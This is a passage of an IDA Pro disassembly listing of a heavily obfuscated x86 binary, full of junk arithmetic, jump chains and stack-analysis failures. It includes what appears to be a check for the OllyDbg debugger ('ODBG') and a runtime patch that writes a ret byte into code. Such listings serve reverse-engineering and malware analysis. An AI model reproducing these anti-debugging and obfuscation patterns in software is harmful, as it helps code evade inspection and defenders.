; ---------------------------------------------------------------------------

loc_459422:				; CODE XREF: k2vbe3.d:00453AAAj
		jnz	loc_45B9F4

loc_459428:				; CODE XREF: k2vbe3.d:00453A8Cj
		or	edi, 16B9AB31h
		add	edi, 694A33A3h
		xchg	edi, [esp]
		jmp	loc_441208
; ---------------------------------------------------------------------------

loc_45943C:				; DATA XREF: sub_44416D:loc_4504E2o
		call	sub_443C0D
		pop	ecx
		mov	[ebp-20h], eax
; START	OF FUNCTION CHUNK FOR sub_44416D

loc_459445:				; CODE XREF: sub_44416D-4483j
					; sub_44416D:loc_44A3CEj ...
		jz	loc_457B19
		test	byte ptr [ebp-8], 40h
		jmp	loc_44EA85
; END OF FUNCTION CHUNK	FOR sub_44416D
; ---------------------------------------------------------------------------
		mov	ecx, [ebp+0]
		jmp	loc_43DDB9
; ---------------------------------------------------------------------------
		push	ebx
		mov	ebx, edi
		xchg	ebx, [esp]
		push	94EE6BF3h
		pop	edi
		and	edi, 4DECE6C3h
		xor	edi, 9FDA5DE7h
		add	edi, 650DD67Bh
		jmp	loc_43CB01
; ---------------------------------------------------------------------------

loc_45947F:				; DATA XREF: sub_43DA1E+8B79o
		add	eax, 64DE5EF1h
		push	eax
		push	ecx
		push	0BEB6ED0Dh
		pop	ecx
		jmp	loc_454F52
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E503

loc_459492:				; CODE XREF: sub_44E503-4FA0j
		xchg	ebx, [esp+4+var_4]
		jmp	loc_459A25
; END OF FUNCTION CHUNK	FOR sub_44E503
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45BB4D

loc_45949A:				; CODE XREF: sub_45BB4D+10j
		mov	ds:off_41E070, eax
		lea	eax, sub_4526F4
		mov	byte ptr [eax],	0C3h
		jmp	sub_4526F4
; END OF FUNCTION CHUNK	FOR sub_45BB4D

; =============== S U B	R O U T	I N E =======================================



sub_4594AE	proc near		; CODE XREF: sub_40D27E+40p
					; sub_410D1B+2Dp ...
		call	sub_45530F
		jmp	ds:off_41E074
sub_4594AE	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44469A

loc_4594B9:				; CODE XREF: sub_44469A-6642j
		jge	loc_45711A

loc_4594BF:				; CODE XREF: k2vbe3.d:0044D2B4j
		jmp	loc_452F21
; END OF FUNCTION CHUNK	FOR sub_44469A
; ---------------------------------------------------------------------------

loc_4594C4:				; CODE XREF: k2vbe3.d:loc_453F68j
		jle	loc_457F88
		jmp	loc_457118
; ---------------------------------------------------------------------------

loc_4594CF:				; CODE XREF: k2vbe3.d:loc_4490D2j
		jl	loc_45BED4

loc_4594D5:				; CODE XREF: k2vbe3.d:0045A831j
		jmp	locret_449611
; ---------------------------------------------------------------------------
		xchg	eax, ecx
		adc	ebx, 87ED5DA6h
		cmp	eax, ebp
		jmp	loc_45BECE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440C94

loc_4594E9:				; CODE XREF: sub_440C94+14151j
		add	eax, 64791D47h
		call	sub_45AB6D
; END OF FUNCTION CHUNK	FOR sub_440C94
; START	OF FUNCTION CHUNK FOR sub_441632

loc_4594F4:				; CODE XREF: sub_441632+B7D0j
		lea	eax, [ebp-14h]
		xor	edx, edx
		call	sub_45B74D
		call	sub_45AA57
		call	nullsub_19

loc_459508:				; CODE XREF: sub_441632+15j
					; sub_4436CE+17332j
		mov	eax, ds:dword_4411CC
		jmp	loc_44F3BC
; END OF FUNCTION CHUNK	FOR sub_441632
; ---------------------------------------------------------------------------
		pop	ebx
		jmp	sub_44B3C0
; ---------------------------------------------------------------------------

loc_459518:				; CODE XREF: k2vbe3.d:0045ADCCj
		jge	loc_4423E4
		test	esi, 57C61EC7h

loc_459524:				; CODE XREF: k2vbe3.d:0043DB3Cj
		jmp	loc_43FADC
; ---------------------------------------------------------------------------
		push	304845BCh
		jmp	sub_455CFE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A0D7

loc_459533:				; CODE XREF: sub_44A0D7:loc_44AD87j
		jz	loc_44DE55
		jmp	loc_441EB0
; END OF FUNCTION CHUNK	FOR sub_44A0D7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445FE0

loc_45953E:				; CODE XREF: sub_445FE0:loc_43DD5Aj
		push	offset loc_457FD3
		jmp	loc_451AF9
; END OF FUNCTION CHUNK	FOR sub_445FE0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C3A9

loc_459548:				; CODE XREF: sub_43C3A9+1B820j
		call	sub_44B320

loc_45954D:				; CODE XREF: k2vbe3.d:0045B94Aj
		jmp	loc_44D943
; END OF FUNCTION CHUNK	FOR sub_43C3A9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44314D

loc_459552:				; CODE XREF: sub_44314D+AB2j
		jmp	loc_4469B6
; END OF FUNCTION CHUNK	FOR sub_44314D
; ---------------------------------------------------------------------------

loc_459557:				; CODE XREF: k2vbe3.d:0045B06Dj
		jb	loc_446492

loc_45955D:				; CODE XREF: k2vbe3.d:loc_45A4F7j
		call	sub_43C04E
		test	al, al
		jz	loc_4414EA
		jmp	loc_451423
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F7AC

loc_45956F:				; CODE XREF: sub_43F7AC:loc_43D1A8j
		jnz	loc_43E9C6
		jmp	loc_45AF4F
; END OF FUNCTION CHUNK	FOR sub_43F7AC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44067C

loc_45957A:				; CODE XREF: sub_44067C+1BAFEj
		jnz	loc_455F5C
; END OF FUNCTION CHUNK	FOR sub_44067C
; START	OF FUNCTION CHUNK FOR sub_44E0F6

loc_459580:				; CODE XREF: sub_44E0F6-BD60j
					; k2vbe3.d:00457B3Ej
		jmp	loc_450B94
; END OF FUNCTION CHUNK	FOR sub_44E0F6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4545C4

loc_459585:				; CODE XREF: sub_4545C4-9A19j
		jmp	loc_45238C
; END OF FUNCTION CHUNK	FOR sub_4545C4
; ---------------------------------------------------------------------------

loc_45958A:				; CODE XREF: k2vbe3.d:00445035j
		jmp	loc_44C7CC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443916

loc_45958F:				; CODE XREF: sub_443916+25j
		jmp	loc_44DE47
; END OF FUNCTION CHUNK	FOR sub_443916
; ---------------------------------------------------------------------------
		jb	loc_459409
		jb	loc_4521C0
		sub	edx, edi
		jmp	loc_455F59
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44662B

loc_4595A7:				; CODE XREF: sub_44662B:loc_440322j
		jl	loc_453BF0

loc_4595AD:				; CODE XREF: sub_45AB6D+Cj
		jmp	sub_44A980
; END OF FUNCTION CHUNK	FOR sub_44662B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AD9D

loc_4595B2:				; CODE XREF: sub_44AD9D+C638j
		jmp	nullsub_321
; END OF FUNCTION CHUNK	FOR sub_44AD9D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449661

loc_4595B7:				; CODE XREF: sub_449661-CBD7j
		jmp	nullsub_322
; END OF FUNCTION CHUNK	FOR sub_449661
; ---------------------------------------------------------------------------
		add	edx, esi
		mov	esi, ebp
		sbb	ebp, ebx
		jmp	loc_453BE8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457DCA

loc_4595C7:				; CODE XREF: sub_457DCA-2D35j
		jnz	loc_44F8BD
		jmp	loc_447E58
; END OF FUNCTION CHUNK	FOR sub_457DCA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BDBB

loc_4595D2:				; CODE XREF: sub_44BDBB+28ABj
		xchg	esi, eax
		pushf
		and	ecx, esi
		jmp	loc_43CEF9
; END OF FUNCTION CHUNK	FOR sub_44BDBB
; ---------------------------------------------------------------------------

locret_4595DC:				; CODE XREF: k2vbe3.d:00441507j
		retn
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_81. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D85C

loc_4595DE:				; CODE XREF: sub_43D85C+14FAEj
		jmp	loc_45738E
; END OF FUNCTION CHUNK	FOR sub_43D85C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FF90

loc_4595E3:				; CODE XREF: sub_43FF90+BB4j
		jmp	loc_451911
; END OF FUNCTION CHUNK	FOR sub_43FF90
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4582DD

loc_4595E8:				; CODE XREF: sub_4582DD-19505j
		jmp	loc_43DB76
; END OF FUNCTION CHUNK	FOR sub_4582DD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E3FD

loc_4595ED:				; CODE XREF: sub_43E3FD-1BF2j
		jmp	loc_449AB6
; END OF FUNCTION CHUNK	FOR sub_43E3FD
; ---------------------------------------------------------------------------

loc_4595F2:				; CODE XREF: k2vbe3.d:004442BBj
		push	ebx
		mov	ebx, edx
		xchg	ebx, [esp]
		push	6F50DD68h
		jmp	loc_444429
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_474. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A21D

loc_459603:				; CODE XREF: sub_45A21D-C1C9j
		jmp	loc_45138E
; END OF FUNCTION CHUNK	FOR sub_45A21D
; ---------------------------------------------------------------------------

loc_459608:				; CODE XREF: k2vbe3.d:0044DF82j
		jnz	loc_453FCB

; =============== S U B	R O U T	I N E =======================================



sub_45960E	proc near		; CODE XREF: sub_4563FD+Bp

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 004411E5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004576A6 SIZE 0000001D BYTES

		xchg	ebx, [esp-4+arg_0]
		pop	ebx
		xchg	ebp, [esp+0]
		jmp	loc_4576A6
sub_45960E	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4461D5

loc_45961A:				; CODE XREF: sub_4461D5+6044j
		mov	ebp, [edx]
		jle	loc_458425
		and	ecx, eax
		jmp	loc_452FD0
; END OF FUNCTION CHUNK	FOR sub_4461D5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45BA22

loc_459629:				; CODE XREF: sub_45BA22:loc_45BA30j
		add	edi, 5776A28Dh
		xchg	edi, [esp+0]
		jmp	sub_4553CC
; END OF FUNCTION CHUNK	FOR sub_45BA22
; ---------------------------------------------------------------------------

loc_459637:				; DATA XREF: sub_440C94:loc_44AE12o
		sub	al, 99h
		push	offset sub_45890F
		jmp	locret_44F9F8
; ---------------------------------------------------------------------------

loc_459643:				; CODE XREF: k2vbe3.d:004533AFj
		jz	loc_445ECF
; START	OF FUNCTION CHUNK FOR sub_4460FD

loc_459649:				; CODE XREF: sub_4460FD:loc_44B465j
		jmp	loc_44D6E8
; END OF FUNCTION CHUNK	FOR sub_4460FD
; ---------------------------------------------------------------------------
		dw 0FB03h
		dd 0AA158A0Fh, 6CE9FFFFh
		db 0C8h, 0FEh, 0FFh
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4534C2

loc_45965B:				; CODE XREF: sub_4534C2-F1E3j
		sub	esi, 2CA9195Bh
		and	esi, 0C176DC7Ah
		xor	esi, 4EB09EB5h
		add	esi, ebp
		add	esi, 31192965h
		mov	[esi], eax
		pop	esi
		jmp	loc_44C757
; END OF FUNCTION CHUNK	FOR sub_4534C2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CF35

loc_45967D:				; CODE XREF: sub_43CF35+B931j
		jnz	sub_454447
		jmp	loc_45B288
; END OF FUNCTION CHUNK	FOR sub_43CF35
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45156D

loc_459688:				; CODE XREF: sub_45156D:loc_452A39j
		mov	eax, [eax]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_443A83
		jmp	loc_443ECC
; END OF FUNCTION CHUNK	FOR sub_45156D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_459698:				; CODE XREF: sub_45A323:loc_43E68Fj
					; sub_45A323-16AEDj
		mov	eax, [ebp-4]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_43DC12
		jmp	loc_453B54
; END OF FUNCTION CHUNK	FOR sub_45A323

; =============== S U B	R O U T	I N E =======================================



sub_4596A9	proc near		; CODE XREF: k2vbe3.d:00444B32j
					; k2vbe3.d:00457D90p
		xchg	esi, [esp+0]
		pop	esi
		add	eax, [ebp-4]
		xor	edx, edx
sub_4596A9	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_4582DD

loc_4596B2:				; CODE XREF: sub_4582DD-25A2j
		jmp	loc_43C216
; END OF FUNCTION CHUNK	FOR sub_4582DD
; ---------------------------------------------------------------------------
		jmp	ds:off_41E1AC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457A58

loc_4596BD:				; CODE XREF: sub_43CF1B+7j
					; k2vbe3.d:0044B062j ...
		jo	loc_43CF27
		push	offset loc_44A418
		jmp	loc_45111D
; END OF FUNCTION CHUNK	FOR sub_457A58
; ---------------------------------------------------------------------------

loc_4596CD:				; CODE XREF: k2vbe3.d:00447703j
		jl	loc_44D231

loc_4596D3:				; CODE XREF: k2vbe3.d:00446DD1j
		jmp	sub_448D3A
; ---------------------------------------------------------------------------
		jbe	loc_43E920
		jmp	loc_44B6FA
; ---------------------------------------------------------------------------

loc_4596E3:				; CODE XREF: k2vbe3.d:0045BC30j
		xchg	ecx, ebx
		mov	[edi], esi
		jmp	loc_450CD2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450A40

loc_4596EC:				; CODE XREF: sub_450A40+6E73j
		sub	ebp, 0C53544BDh
		pop	edx

loc_4596F3:				; CODE XREF: sub_450A40:loc_45C2FDj
		call	sub_4436CE
		mov	edx, 0BE8CE1B7h
		push	ebx
		jmp	loc_44D8F1
; END OF FUNCTION CHUNK	FOR sub_450A40
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A79B

loc_459703:				; CODE XREF: sub_44A79B:loc_44E255j
					; sub_45A2AF+1BD6j
		jnz	loc_44D1F8

loc_459709:				; CODE XREF: sub_45A323-13EB0j
		jmp	loc_449657
; END OF FUNCTION CHUNK	FOR sub_44A79B
; ---------------------------------------------------------------------------
		dw 0F881h
		dd 0A06DCC54h, 0FEFB55E9h
		db 0FFh
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_261. PRESS KEYPAD	"+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================



sub_45971A	proc near		; CODE XREF: k2vbe3.d:0043FD79j
					; sub_44D0D5-B6E5p

; FUNCTION CHUNK AT 0044E078 SIZE 00000011 BYTES

		xchg	eax, [esp+0]
		pop	eax
		push	0EC5A86Ah
		pop	eax
		jmp	loc_44E078
sub_45971A	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_459729	proc near		; DATA XREF: sub_449372+21ADo

; FUNCTION CHUNK AT 00442841 SIZE 00000005 BYTES

		add	ecx, 0F2563E3Ah
		xchg	ecx, [esp+0]
		jmp	loc_442841
sub_459729	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455C7A

loc_459737:				; CODE XREF: sub_455C7A-45C9j
		mov	ecx, [esi]
		jnb	loc_4565AE
		add	eax, edx
		mov	ecx, [eax]

loc_459743:				; CODE XREF: sub_455C7A:loc_459F1Fj
		mov	eax, 0A2CD59D9h
		call	sub_4553CC
		rol	eax, 6
		push	esi
		jmp	loc_45983B
; END OF FUNCTION CHUNK	FOR sub_455C7A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45BB9D

loc_459756:				; CODE XREF: sub_45BB9D-1433Dj
		sub	edi, 0DC9101Ah
; END OF FUNCTION CHUNK	FOR sub_45BB9D
; START	OF FUNCTION CHUNK FOR sub_43F34C

loc_45975C:				; CODE XREF: sub_43F34C+Dj
					; sub_45BB9D:loc_44D328j ...
		jmp	loc_443111
; ---------------------------------------------------------------------------

loc_459761:				; CODE XREF: sub_43F34C-1717j
					; sub_45BB9D+Fj
		pop	ecx
		xchg	esi, [esp-4+arg_0]
		push	offset sub_44E478
		jmp	nullsub_326
; END OF FUNCTION CHUNK	FOR sub_43F34C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_45976F:				; CODE XREF: sub_45A323-11F63j
		xchg	ebx, ebp

loc_459771:				; CODE XREF: sub_45A323:loc_44F3D1j
		mov	eax, [ebp-4]
		push	offset sub_4585F2
		jmp	loc_445E48
; END OF FUNCTION CHUNK	FOR sub_45A323
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450A40

loc_45977E:				; CODE XREF: sub_450A40:loc_44D8F1j
		push	0A379504Fh
		pop	ebx
; END OF FUNCTION CHUNK	FOR sub_450A40
; START	OF FUNCTION CHUNK FOR sub_441D41

loc_459784:				; CODE XREF: sub_441D41+14C32j
		xor	ebx, 7CE10807h
		add	ebx, 20AC6048h
		xchg	ebx, [esp+0]
		jmp	loc_43EF93
; END OF FUNCTION CHUNK	FOR sub_441D41

; =============== S U B	R O U T	I N E =======================================



sub_459798	proc near		; DATA XREF: k2vbe3.d:0044C716o

; FUNCTION CHUNK AT 00446503 SIZE 00000005 BYTES

		shl	eax, cl
		not	eax
		and	ebx, eax
		push	offset sub_458863
		jmp	loc_446503
sub_459798	endp

; ---------------------------------------------------------------------------

loc_4597A8:				; CODE XREF: k2vbe3.d:loc_43DFCCj
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45687E

loc_4597A9:				; CODE XREF: sub_45687E+Aj
		jmp	loc_44523A
; END OF FUNCTION CHUNK	FOR sub_45687E

; =============== S U B	R O U T	I N E =======================================



sub_4597AE	proc near		; CODE XREF: sub_43C03A+4p
					; k2vbe3.d:loc_43C970j	...

var_C		= dword	ptr -0Ch
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00440ABB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00440D5F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00443448 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004436B2 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00447418 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044940B SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044B4B9 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044BF8C SIZE 00000003 BYTES
; FUNCTION CHUNK AT 0045022F SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00451568 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453CFD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456CC0 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00457350 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0045809D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A741 SIZE 00000005 BYTES

		jz	loc_443448

loc_4597B4:				; CODE XREF: sub_440621:loc_4406A1j
		push	edx
		mov	edx, ebp
		jmp	loc_457350
sub_4597AE	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_4597BC:				; CODE XREF: k2vbe3.d:00455480j
		cmp	ebp, 6BCB15A8h
		jmp	loc_457CC2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BB73

loc_4597C7:				; CODE XREF: sub_44BB73:loc_43E47Fj
		test	ecx, 2000000h
		jmp	loc_4573DA
; END OF FUNCTION CHUNK	FOR sub_44BB73
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CF52

loc_4597D2:				; CODE XREF: sub_43CF52:loc_43C7B4j
		lea	eax, sub_45301F
		mov	[ecx+0B8h], eax
		pop	ecx
		xor	eax, eax
		jmp	nullsub_339
; END OF FUNCTION CHUNK	FOR sub_43CF52

; =============== S U B	R O U T	I N E =======================================



sub_4597E6	proc near		; CODE XREF: sub_45AFD3j
					; DATA XREF: sub_45AFC0+9o

; FUNCTION CHUNK AT 00444FDE SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004505E4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457F8D SIZE 0000000B BYTES

		mov	esp, ebp
		pop	ebp
		mov	eax, ds:dword_445618
		or	eax, eax
		jmp	loc_444FDE
sub_4597E6	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_4597F6:				; CODE XREF: sub_44C90E-BC96j
					; sub_44C90E:loc_44C616j
		push	0
		push	0
		push	10h
		mov	eax, [ebp+8]
		push	eax
		call	sub_43CC89
		jmp	loc_454E8F
; END OF FUNCTION CHUNK	FOR sub_44C90E
; ---------------------------------------------------------------------------

loc_45980A:				; CODE XREF: k2vbe3.d:0044C79Cj
		jl	loc_458A46

; =============== S U B	R O U T	I N E =======================================



sub_459810	proc near		; CODE XREF: k2vbe3.d:0044BDE0p

; FUNCTION CHUNK AT 004449F7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B736 SIZE 00000008 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		mov	[edi], eax
		pop	edi
		lea	eax, nullsub_514
		jmp	loc_4449F7
sub_459810	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4486D7

loc_459822:				; CODE XREF: sub_4486D7+124E2j
		xchg	edx, [esp+4+var_4]
		jmp	loc_44018C
; END OF FUNCTION CHUNK	FOR sub_4486D7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_45982A:				; CODE XREF: sub_44C90E:loc_44D685j
		jl	loc_4442F2

loc_459830:				; CODE XREF: sub_4440CA+1E4Cj
		jmp	nullsub_391
; END OF FUNCTION CHUNK	FOR sub_44C90E
; ---------------------------------------------------------------------------
		cdq
		jmp	loc_4442E4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455C7A

loc_45983B:				; CODE XREF: sub_455C7A+3AD7j
		push	0D5B09659h
		pop	esi
		or	esi, 8BE09659h
		rol	esi, 17h
		add	esi, 5988E956h
		xor	esi, 48D81088h
		jmp	loc_44356F
; END OF FUNCTION CHUNK	FOR sub_455C7A
; ---------------------------------------------------------------------------

loc_45985B:				; CODE XREF: k2vbe3.d:0044E33Aj
		mov	ecx, [ebp+0]

; =============== S U B	R O U T	I N E =======================================



sub_45985E	proc near		; CODE XREF: sub_44D9A7-40CBp
		xchg	esi, [esp+0]
		pop	esi
		push	0AEC6B013h
		pop	edi
		jmp	loc_45B290
sub_45985E	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_45986D:				; CODE XREF: k2vbe3.d:00441086j
		cmp	ebx, edi
		jmp	loc_444F6B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B912

loc_459874:				; CODE XREF: sub_44B912:loc_4548A1j
		jz	loc_44AEBE

loc_45987A:				; CODE XREF: sub_448DD4+10314j
		jmp	nullsub_330
; END OF FUNCTION CHUNK	FOR sub_44B912
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C1BD

loc_45987F:				; CODE XREF: sub_452D81-93AEj
					; sub_44C1BD:loc_457811j
		jmp	loc_44EBD8
; END OF FUNCTION CHUNK	FOR sub_44C1BD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447C43

loc_459884:				; CODE XREF: sub_447C43-8EE6j
		jmp	nullsub_283
; END OF FUNCTION CHUNK	FOR sub_447C43
; ---------------------------------------------------------------------------
		sbb	ebp, 8A9744D2h
		push	esi
		jmp	loc_44AEBB
; ---------------------------------------------------------------------------

loc_459895:				; CODE XREF: k2vbe3.d:0043FD6Bj
					; DATA XREF: sub_44A79B+CC0Ao
		mov	edx, 9E849D81h
		call	sub_45B20A
		push	eax
		ror	eax, 0Dh

loc_4598A3:				; CODE XREF: k2vbe3.d:0044CC44j
		push	edx
		jmp	loc_4581F5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B20A

loc_4598A9:				; CODE XREF: sub_45B20A:loc_448BACj
		test	ecx, 4000000h
		jmp	loc_448C5E
; END OF FUNCTION CHUNK	FOR sub_45B20A
; ---------------------------------------------------------------------------

loc_4598B4:				; CODE XREF: k2vbe3.d:0043F285j
		jb	loc_44535A

loc_4598BA:				; CODE XREF: k2vbe3.d:0045202Aj
		rol	eax, 5
		test	eax, 40h
		jmp	loc_440DCD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448DD4

loc_4598C8:				; CODE XREF: sub_448DD4-99CBj
		mov	eax, [ebp-14h]
		mov	eax, [eax+18h]
		dec	eax
		test	eax, eax
		jl	loc_452C93
		inc	eax
		jmp	loc_45892C
; END OF FUNCTION CHUNK	FOR sub_448DD4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44469A

loc_4598DD:				; CODE XREF: sub_44469A:loc_45536Cj
		jnz	loc_440431
		sub	al, 99h
		push	61D00018h
		pop	edx
		rol	edx, 1Ch
		jmp	loc_44C58A
; END OF FUNCTION CHUNK	FOR sub_44469A
; ---------------------------------------------------------------------------

loc_4598F3:				; CODE XREF: k2vbe3.d:0044113Bj
		or	eax, 10h
		mov	edx, [ebp+8]
		mov	[edx-8], eax
		jmp	loc_443902
; ---------------------------------------------------------------------------

loc_459901:				; CODE XREF: k2vbe3.d:loc_44112Cj
		cmp	dword ptr [ebp-10h], 2
		jnz	loc_443902
		mov	eax, [ebp+8]
		or	dword ptr [eax-8], 8
		jmp	loc_443902
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446478

loc_459917:				; CODE XREF: sub_446478:loc_4400B0j
		pop	eax
		add	eax, 0EE73D187h
		cmp	eax, 0DE66CD26h
		jmp	loc_440578
; END OF FUNCTION CHUNK	FOR sub_446478
; ---------------------------------------------------------------------------

loc_459929:				; CODE XREF: k2vbe3.d:0044FB35j
		pop	edx
		and	edx, ds:4000EBh
		add	edx, 0E5294BC6h
		add	eax, edx
		jmp	loc_448702
; ---------------------------------------------------------------------------

loc_45993D:				; DATA XREF: sub_44D022:loc_44D027o
		jo	loc_43E917
		mov	eax, [esp]
		push	edx
		call	sub_44E481
		push	0DDD17361h
		call	sub_44A8FD
; START	OF FUNCTION CHUNK FOR sub_43E135

loc_459956:				; CODE XREF: sub_43E135+231Ej
		jmp	loc_455F33
; END OF FUNCTION CHUNK	FOR sub_43E135

; =============== S U B	R O U T	I N E =======================================



sub_45995B	proc near		; DATA XREF: sub_446E24:loc_447289o
		mov	eax, 400h
		call	sub_446478
sub_45995B	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_44D298

loc_459965:				; CODE XREF: sub_44D298+502Cj
		jmp	loc_456434
; END OF FUNCTION CHUNK	FOR sub_44D298
; ---------------------------------------------------------------------------

loc_45996A:				; CODE XREF: k2vbe3.d:0043C195j
		jmp	loc_459E90
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D59D

loc_45996F:				; CODE XREF: sub_44D59D:loc_4421FCj
					; sub_44D59D:loc_442B48j
		call	sub_45AA57
		test	eax, eax
		jz	loc_440F45
		jmp	loc_442CA2
; END OF FUNCTION CHUNK	FOR sub_44D59D
; ---------------------------------------------------------------------------

loc_459981:				; CODE XREF: k2vbe3.d:004589E0j
		mov	esi, edi

loc_459983:				; CODE XREF: k2vbe3.d:loc_44E79Cj
		lea	eax, [ebp-2AAh]
		cmp	dword ptr [eax], 4742444Fh
		jz	loc_44DE55
		jmp	loc_44D268
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_203. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E0F6

loc_45999B:				; CODE XREF: sub_44E0F6+691Fj
		jmp	nullsub_332
; END OF FUNCTION CHUNK	FOR sub_44E0F6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EFDA

loc_4599A0:				; CODE XREF: sub_43EFDA+F5FCj
		jmp	loc_44CFF8
; END OF FUNCTION CHUNK	FOR sub_43EFDA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4582DD

loc_4599A5:				; CODE XREF: sub_4582DD-16793j
		jmp	loc_444470
; END OF FUNCTION CHUNK	FOR sub_4582DD

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4599AA	proc near		; CODE XREF: sub_4499EC-CFC6p
					; sub_43DA0B+9p ...

; FUNCTION CHUNK AT 0044FEFC SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00457207 SIZE 00000005 BYTES

		push	ecx
		mov	ecx, ebp
		xchg	ecx, [esp+0]
		mov	ebp, esp
		jmp	loc_457207
sub_4599AA	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_527. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_4599B8:				; CODE XREF: k2vbe3.d:00443822j
		jmp	loc_447739
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4529E2

loc_4599BD:				; CODE XREF: sub_4529E2-F155j
		jo	loc_44DD12
		mov	[ecx], esi

